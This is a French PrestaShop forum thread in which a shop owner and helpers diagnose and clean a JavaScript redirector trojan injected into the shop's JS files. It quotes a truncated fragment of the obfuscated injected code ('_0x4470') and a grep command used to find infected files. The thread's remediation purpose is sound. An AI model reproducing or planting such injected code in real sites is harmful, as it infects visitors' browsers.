Cheval de Troie détecté sur certains navigateurs - help

[Laptopper]

Bonjour,

 

Depuis un certains temps, certains client se plaignent que leur antivirus détecte un cheval de troie ou logiciel malveillant sur mon site. Ça a l'air d'arriver plutôt aux gens utilisant IE. Est-ce que quelqu'un aurait une idée de comment l'enlever ? Je suis totalement démuni face à ce problème...

 

Merci d'avance !

[Patric]

Bonjour Laptopper,

 

Tu n'as pas plus d'informations à ce sujet (nom d'un fichier infecté, d'un script, etc.) ?

Quelle est ta version de PrestaShop ?

Est-ce que tu as installé des modules tiers (autres que ceux proposés en natif) ?

[DevNet]

Bonjour,

 

Quelle est l'adresse de votre boutique ?

 

Quand vous dites "certains clients", est-ce un, deux, plus ?

 

Bien cordialement

[Laptopper]

Bonjour,

 

Merci pour votre réponse rapide,

 

Je suis sur la version

1.3.2.3

de presta et je n'ai pas installé de nouveau module depuis longtemps or ce problème semble assez récent.

 

Cependant les modules que j'ai sont :

SotEW's Adds Bis

v0.4

Boosket

v1.3

Google Shopping

v1.5

Page Peel Block

v1.0

FB Connect block

v0.2

Detovy Twitter Share & Facebook Comment

v1.0

Purchase without registering

v0.3

Twitter Connect

v0.1

 

Je n'ai aucune idée du fichier où il peut se cacher. Y a t-il un moyen de scanner mon FTP ?

 

Merci encore pour ton aide,

[Laptopper]

@devnet

 

L'adresse de la boutique est http://www.laptopper.fr

 

Oui c'est plus que 2 et cela a augmenté ces derniers jours. :s

[DevNet]

Savez-vous à quoi correspond le script lancé dans vos pages :

 

<!-- begin olark code --><script type='text/javascript'>/*<![CDATA[*/window.olark||(function(i){var e=window,h=document,a=e.location.protocol=="https:"?"https:":"http:",g=i.name,b="load";(function(){e[g]=function(){(c.s=c.s||[]).push(arguments)};var c=e[g]._={},f=i.methods.length; while(f--){(function(j){e[g][j]=function(){e[g]("call",j,arguments)[spam-filter])(i.methods[f])} c.l=i.loader;c.i=arguments.callee;c.f=setTimeout(function(){if(c.f){(new Image).src=a+"//"+c.l.replace(".js",".png")+"&"+escape(e.location.href)}c.f=null},20000);c.p={0:+new Date};c.P=function(j){c.p[j]=new Date-c.p[0]};function d(){c.P(;e[g](}e.addEventListener?e.addEventListener(b,d,false):e.attachEvent("on"+b,d); (function(){function l(j){j="head";return["<",j,"></",j,"><",z,' onl'+'oad="var d=',B,";d.getElementsByTagName('head')[0].",y,"(d.",A,"('script')).",u,"='",a,"//",c.l,"'",'"',"></",z,">"].join("")}var z="body",s=h[z];if(!s){return setTimeout(arguments.callee,100)}c.P(1);var y="appendChild",A="createElement",u="src",r=h[A]("div"),G=r[y](h[A](g)),D=h[A]("iframe"),B="document",C="domain",q;r.style.display="none";s.insertBefore(r,s.firstChild).id=g;D.frameBorder="0";D.id=g+"-loader";if(/MSIE[ ]+6/.test(navigator.userAgent)){D.src="javascript:false"} D.allowTransparency="true";G[y](D);try{D.contentWindow[b].open()}catch(F){i[C]=h[C];q="javascript:var d="+B+".open();d.domain='"+h.domain+"';";D[u]=q+"void(0);"}try{var H=D.contentWindow[b];H.write(l());H.close()}catch(E){D[u]=q+'d.write("'+l().replace(/"/g,String.fromCharCode(92)+'"')+'");d.close();'}c.P(2)})()})()})({loader:(function(a){return "static.olark.com/jsclient/loader0.js?ts="+(a?a[1]+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]});
/* custom configuration goes here (www.olark.com/documentation) */
olark.identify('4548-829-10-9938');/*]]>*/</script>
<!-- end olark code --></div>

 

Est-ce un traceur de visites ?

[Laptopper]

@devnet Oui , il s'agit du système de chat live.

[jeckyl]

Bonjour,

 

votre soucis arrive sur tout le site ou seulement sur certaines pages ?

[Laptopper]

@jeckyl a priori dès que quelqu'un arrive sur le site.

 

Le souci c'est que je peux pas vérifier car je suis sur mac et chrome et ils ne détectent rien.

 

Je pense que sur tout le site... mais je suis pas sûr.

 

Merci

[jeckyl]

Pareil, je suis sur Mac, pas de soucis.

 

je ne vais pas tester sur mes machines virtuelles PC car je n'ai pas installer d'antivirus ;-)

 

donc si un PCiste courageux pouvait faire un retour.

[DevNet]

Bah, le réponse est simple, il suffit de regarder pas à pas le code js pour savoir si un code malicieux s'est glissé dedans. Il existe le script js interne à votre hébergement, et ceux externe qui sont chargé à la volée depuis d'autres appels de scripts (c'est le cas dans vos pages).

 

Demandez aussi un rapport à vos clients sur leur "alerte", car si ceux sont des plugins "sécuritaires" d'éditeurs tiers, ou des anti-virus / scan sur le service http du client, il faut en déterminer exactement le rapport pour savoir s'il est fiable ou non.

[Laptopper]

@devnat merci pour ta reponse, ou puis je trouver le code js/script js ? S'agit-il des fichier présents ds le dossier js de prestashop ?

 

(désolé je ne suis pas assez pro)

 

merci

[DevNet]

PrestaShop possède ses propres js, mais aussi les modules que vous avez installés, et votre thème. Si il s'avère qu'un code supplémentaire semble ne pas être à sa place à l'endroit prévu par l'un des trois propriétaires (prestashop, modules, thème), cela veut dire que soit c'est vous même qui avez intégré le code, soit c'est une injection ou une modification mal-intentionnée dans vos fichiers.

 

Si vous n'avez pas assez de recul pour analyser tout ça, il faudrait qu'une âme charitable prenne un certain temps à lire pas à pas la séquence d'un chargement de page et la comprenne. Il faut en comparer les scripts pour savoir s'ils appartiennent bien à un traitement "normal" de vos pages.

 

Mais avant de se lancer dans cette phase, je demanderai des précisions sur les rapports de détection de vos clients. Cela peut vous aider votre recherche.

[coeos.pro]

Bonjour, je viens de cliquer sur le lien de ta boutique et j'ai eu immédiatement un message de Microsoft Security Essential (je suis sous chrome : 15.0.874.121 m) en rouge (alerte grave) : nettoyé immédiatement, voici un lien sur les détails du trojan http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Trojan%3aJS%2fRedirector.AAA&threatid=2147652920

 

J'imagine que tes clients on eu le même message (de Microsoft Security Essential ) :

 

 

 

Catégorie : Cheval de Troie

 

Description : Ce programme est dangereux. Il exécute des commandes émanant d'une personne malveillante.

 

Action recommandée : Supprimer immédiatement ce logiciel.

 

Security Essentials a détecté des programmes pouvant compromettre la confidentialité de vos données, voire endommager votre ordinateur. Vous pouvez accéder aux fichiers utilisés par ces programmes sans les supprimer, mais cela n'est pas recommandé. Pour accéder à ces fichiers, sélectionnez l'action Autoriser et cliquez sur Appliquer les actions. Si cette option n'est pas disponible, connectez-vous en tant qu'administrateur ou demandez à l'administrateur sécurité de vous assister.

 

Éléments :

file:C:\Users\vincent\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000732

file:C:\Users\vincent\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000733

file:C:\Users\vincent\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000734

file:C:\Users\vincent\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000735

file:C:\Users\vincent\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000736

 

Obtenir des informations en ligne supplémentaires sur cet élément.

[coeos.pro]

Peux tu nous donner une liste de tous les modules avec les liens où tu les as trouvé et qui ne sont pas d'origine dans le zip prestashop, tu es passé par un prestataire ou tu as fait le boulot toi même ?

 

Fait vite, le problème est quand même grave si google s'en rend compte tu risques d'être mis de coté dans le référencement

 

=> As tu rajouté un module récemment ? tu as passé un antivirus sur ton ordi, j'ai déjà vu un problème plus ou moins similaire sur ce forum ou la personne avait un ordi infecté par un virus qui récuperait les mots de passe de connexion FTP de filezilla

[DevNet]

Je pense en avoir trouvé une partie.

 

Ouvrez votre fichier ./js/tools.js, et supprimez la dernière ligne du fichier :

 

var _0x4470=["\x39\x3D\x31\x2E\x64	 [...]	 7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

 

Déjà ça c'est pas bon signe d'avoir ce genre de ligne dans ses JS.

 

idem pour les fichiers :

• ./js/jquery/jquery-1.2.6.pack.js
  
• ./js/jquery/jquery.easing.1.3.js
  

... j'arrête là, tous vos fichiers JS semblent infectés.

[Laptopper]

Bonjour,

 

Merci à tous pour votre aide. J'ai du m'absenter quelques heures, désolé.

 

@coeos.pro merci pour ton check sur Microsoft Essential, un client vient de me dire qu'il a eu à peu pres le meme message.

 

Les derniers modules que j'ai installés (il y a deja longtemps, décembre) sont ceux ci je pense : Purchase without registering

v0.3 ou

Export commandes

v1.0

En ce qui concerne les autres modules, il y en avait d'office avec le theme que j'ai installé au début de la création du site donc je n'arrive pas trop a faire le tri entre eux et les officiels presta.

Mais je pense que le problème vient de modules téléchargés séparément:

SotEW's Adds Bisv0.4

Boosketv1.3

Google Shoppingv1.5

Page Peel Blockv1.0

FB Connect blockv0.2

Detovy Twitter Share & Facebook Commentv1.0

Purchase without registering v0.3

Twitter Connect

Export commandes v1.0

Par contre je ne me souviens plus où je les ai pris, surement sur ce forum, ou d'autres sites normalement safe...

@

DevNet Merci beaucoup d'avoir checké certains fichiers, je vais essayer de tous les vérifier. Par contre une fois que je les aurai tous faits et nettoyés, y a t il autre chose a faire pour s'en débarrasser ?

Autre question , si je supprime tous les modules non officiel, ça aide ou pas du tout ?

Merci encore à tous pour votre aide si précieuse i

[DevNet]

Ce genre d'injection malware se propage de manières différentes.

 

La première et la plus grave, serait que votre serveur web en lui même propage d'injection. Ca me rappelle une récente histoire avec les trackeurs made in PrestaShop. Si c'est le cas, votre serveur web a sûrement été victime d'une injection sur une faille. Si votre serveur web tourne sur Windows NT, le plugin isapi rewrite installé sur IIS est une porte ouverte bien connue pour y propager de mauvaises intentions. Et windows en lui-même n'est pas très intelligent à la base pour y remédier.

Vérifiez donc la présence de tous les fichiers susceptibles de contenir ce script malware.

J'ai une ligne de commande qui pourrait vous aider dans votre recherche si vous êtes hébergé sous linux avec un accès SSH sur votre hébergement : (à exécuter à la racine de votre hébergement)

 

find . -name "*" -exec grep -Hn "_0x4470" {} \;

 

Cette commande va détecter et lister tous vos fichiers infectés par le malware.

 

Une fois désinfecté, il faut trouver la source du problème, le serveur ? l'hébergement ? un simple script mal codé ? votre pc en lui-même, avec votre utilisation du FTP ?

 

Bref tout peut être malheureusement envisageable.

[coeos.pro]

si je supprime tous les modules non officiel, ça aide ou pas du tout ?

 

pas du tout, ce sont des fichier js natif de prestashop qui sont affectés, il faudrait re-télécharger prestashop 1.3.2.3 ( http://code.google.com/p/prestashop/downloads/detail?name=prestashop_1.3.2.3.zip&can=2&q= ) et transférer les fichiers js via ftp, ainsi que tous les fichiers js des différents modules...

 

Comme le dit Devnet il faut lister les différents points (ordi, hébergement...) et les vérifier... le fait que vous ayez une version ancienne (1.3) peut aussi jouer

[Laptopper]

Ok merci a vous 2 !

 

Je suis en train de vérifier tout les fichiers js, et de supprimer cette foutue ligne. Je l'ai trouvée ds tous les fichiers terminant par .js pour l'instant.

 

Je reviens vers vous dès que j'ai fini.

 

Je suis ds le dossier Js , ensuite je passe au module et ensuite je cherche partout ou il y a d'autres dossier plus susceptible d'être infectés ?

 

Merci encore

[Laptopper]

Bon je viens de me faire tout mon FTP, et j'ai ouvert tous les fichiers .js de tous les dossiers a priori et supprimé ce fichu code.

 

Si quelqu'un qui est sur PC et IE peut me dire si le cheval de troie est toujours là, ce serait cool !

 

Merci d'avance !

[coeos.pro]

je viens de retester ton site avec chrome et firefox (sous seven) et je n'ai eu aucun message d’alerte cette fois, par contre c'est avec le même ordi que cet après midi (je ne sais pas si ça peut jouer), sinon ta boutique est vraiment sympa, en espérant que ce soit bon et que ça ne revienne pas

[loulou66]

Coucou

 

je viens de tester ton site

 

je suis sous seven 64 / Avg internet Security ( bouclier web et link scanner activer )

 

sous chrome et firefox aucun problème

 

sous IE 8 page rouge m'avertissant

 

Site Web d’amorçage signaler

www.laptopper.fr

 

je suis aller le signaler comme sûr sur le site de Microsoft ( liens cliquable dans les détails)

 

https://feedback.sma...laptopper.fr%2f

 

fait de même en mettant que tu est l'admin su site et qu'il s'agit d'une erreur (2 iem phrase)

 

ca provient du filtre smartscreen de IE quelqu'un a du signaler ton site quand il a vu les message de virus

 

voilou

 

@++

 

Loulou66

[Yoya]

Pernses à changer tes codes d'acces FTP et a changer de client FTP si tu utilises Filezilla.

Bonnes ventes à toi.

 

Pierre.

[Laptopper]

@Yoga merci pour le conseil, je vais le faire de ce pas

 

@loulou66 Merci beaucoup pour le link je viens de me déclarer comme admin comme tu m'as dit. J'espère que ça va marcher. En tout cas c'est une bonne chose de pouvoir le faire.

 

@coeos.pro Merci pour tes compliments !

 

Malheureusement je pense qu'il est toujours pas éradiqué... je me suis fais tous les fichiers .Js (tous infectés) et ils semblent clean maintenant.

 

Si quelqu'un d'autre a une idée sur la marche à suivre maintenant...

 

Merci à tous en tout cas...

[DevNet]

Bah on va avancer par des questions !

 

Quel est votre hébergeur ?

Quel est le système ?

Qu'utilisez-vous pour votre FTP ?

Avez-vous vous-même sur votre poste de travail un anti virus, scan malware, etc ?

 

Dites nous tout ce qui pourrai nous faire avancer.

[Laptopper]

Hébergeur: 1&1 (mutualisé)

Système: je ne sais pas trop, ou je peux le voir ?

logiciel acces FTP : cyberduck

 

Je suis sous mac, et je n'ai pas d'anti-virus/scan ou malware sur ce poste de travail.

 

Merci encore

[DevNet]

Alors il doit y avoir autre chose sur votre boutique qui réinstalle la malware automatiquement.

[jeckyl]

Bonjour,

 

il faudrait regardé aussi si vous n'avez pas des fichier php qui ne devraient être présents.

 

pour cela il faut regarder l'arborescence de votre version de prestashop avec celle de base.

[Laptopper]

Ce qui est bizarre, c'est que j'ai re-checké quelques fichiers et ils semblent tous clean...

 

Il n'existe aucun logiciel capable de scanner le FTP et detecter des files infectés ?

[Laptopper]

@jeckyl Merci pour l'info, je vais checker maintenant donc...

[Laptopper]

Hello,

 

J'ai vérifié les fichiers PHP tout semble ok...

 

Par contre j'ai découvert plein d'autres fichiers infectés dans les fichiers de mon blog (sous wordpress)

 

Tout semble propre à présent. Est ce que quelqu'un reçoit encore un message d'alerte virus ?

 

Merci à tous pour votre aide

[Carl Favre]

Avec IE + Firefox, pas de message d'alerte que cela soit la boutique ou le blog.

 

Ce virus semble toucher de nombreux outils comme wordpress, joomla, etc.

[Arlette Dambron]

Bonjour à tous !

A l'aide : Un cheval de Troie a été détecté sur ma boutique version 1.7.5.2. Mon serveur a pu me donner la liste des fichiers infectés, mais je n'ai aucune connaissance pour procéder à quoi que ce soit. 

Qui pourrait m'aider ? 

Merci!

[Mediacom87]

Il y a 2 heures, Arlette Dambron a dit :

Bonjour à tous !

A l'aide : Un cheval de Troie a été détecté sur ma boutique version 1.7.5.2. Mon serveur a pu me donner la liste des fichiers infectés, mais je n'ai aucune connaissance pour procéder à quoi que ce soit. 

Qui pourrait m'aider ? 

Merci!

Bonjour,

une piste https://www.mediacom87.fr/securite-prestashop-proactive-ou-corrective/

et si vous préférez passer par un professionnel https://www.prestatoolbox.fr/services-prestashop-thirtybees/468-ma-boutique-prestashop-s-est-faite-hackee.html

[Arlette Dambron]

Bonjour @ Mediacom87 Je vous remercie pour votre réponse.

Malheureusement, je suis incapable d'y arriver seule. Je viens de me mettre en contact avec un site d'aide, ComeUp en particulier avec LeFreelancer, mais j'avoue être perdue, car je dispose de peu de moyens. Pouvez-vous me conseiller pour choisir la meilleure aide ? Merci.

[P i l o u]

Bonjour,

Tu peux déjà voir ce que cleaner d'Eolia donne, ça va te donner une piste :

Si tu n'en sors pas, je veux bien aider

 

[Mediacom87]

Il y a 6 heures, P i l o u a dit :

Bonjour,

Tu peux déjà voir ce que cleaner d'Eolia donne, ça va te donner une piste :

Si tu n'en sors pas, je veux bien aider

 

Dire qu'il suffit de lire mes articles pour avoir ces informations, mais cela demande de vouloir s'informer et se former.

Dire qu'il suffit de payer un prestataire pour avoir le résultat escompté et une garantie sans devoir se former.

Mais l'une ou l'autre des solutions semble devoir faire appel à un effort, personnel ou financier et étrangement, dès que l'on parle d'effort, y a plus grand monde de nos jours.

Dommage.

PS : je me dis qu'en te citant, tu vas crois que ce texte t'est adressé, ce qui n'est pas le cas, juste que tu communiques une information déjà communiquée qui va demander là encore un effort de type personnel.

[P i l o u]

Je préfère donner un lien interne au forum plutôt qu'une page externe qui dans quelques temps pourra avoir disparu.

[Mediacom87]

Il y a 2 heures, P i l o u a dit :

Je préfère donner un lien interne au forum plutôt qu'une page externe qui dans quelques temps pourra avoir disparu.

Ce n'est pas faux, même si pleins de pages de ce forum furent effacées brutalement, il y a quelque temps.